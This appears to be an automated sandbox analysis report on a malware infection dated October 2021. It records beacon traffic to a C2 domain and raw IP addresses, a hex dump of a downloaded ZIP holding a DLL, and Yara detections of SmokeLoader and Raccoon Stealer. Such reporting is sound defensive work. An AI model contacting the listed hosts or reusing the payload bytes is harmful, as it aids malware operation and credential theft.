61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 18:30:47 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
              Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
              Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
              Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.97
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rctoc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: hajezey1.top
              Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49773 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.7:49778 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              barindex
              Yara detected SmokeLoaderShow sources
              Source: Yara matchFile source: 22.2.CD0D.exe.2fb0e50.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.1.irjbuft.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.0.irjbuft.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.0.irjbuft.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.CD0D.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.6EC5.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.irjbuft.2bf15a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.0.6EC5.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.25Kf6vSBoq.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.25Kf6vSBoq.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.1.6EC5.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.0.6EC5.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.6EC5.exe.2c315a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.irjbuft.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.3.CD0D.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.0.irjbuft.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.25Kf6vSBoq.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.0.6EC5.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000016.00000003.418065622.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.462341902.0000000004791000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.382786562.0000000001F70000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000000.296771196.0000000002871000.00000020.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.461574944.0000000002B80000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.312112789.0000000002051000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.447688119.0000000004BA1000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.434655880.0000000003000000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.382804638.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.311815156.0000000000420000.00000004.00000001.sdmp, type: MEMORY
              Source: 25Kf6vSBoq.exe, 00000001.00000002.257255262.0000000002E5A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              E-Banking Fraud:

              barindex
              Yara detected Raccoon StealerShow sources
              Source: Yara matchFile source: 0000001F.00000002.570848013.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000003.458016800.0000000004870000.00000004.00000001.sdmp, type: MEMORY

              System Summary:

              barindex
              .NET source code contains very large array initializationsShow sources
              Source: DF9C.exe.4.dr, ??????????????/_?????xptkvqfesn.csLarge array initialization: _?????nacpgkwmie: array initializer size 208904
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E32A9
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9DE2C5
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4AEF
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9CFA2B
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9BEB8A
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94EBB0
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94ABD8
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A968BE8
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9C23E3
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A309
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93AB40
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A92B090
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A916800
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1002
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A830
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A948840
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9399BF
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E2EF7
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D67E2
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A942F70
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4496
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9435D0
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A910D20
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E1D55
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_004368D0
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeCode function: 28_2_0041EDCE
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_00425150
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_0042419D
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_0041FAF0
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_00403340
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_00414437
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_00422E27
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_00422F47
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_0041FF88
              Source: CD0D.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: CD0D.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: CD0D.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: CD0D.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: CD0D.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: CD0D.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: CD0D.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: fijbuft.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: fijbuft.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: fijbuft.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: fijbuft.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: fijbuft.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
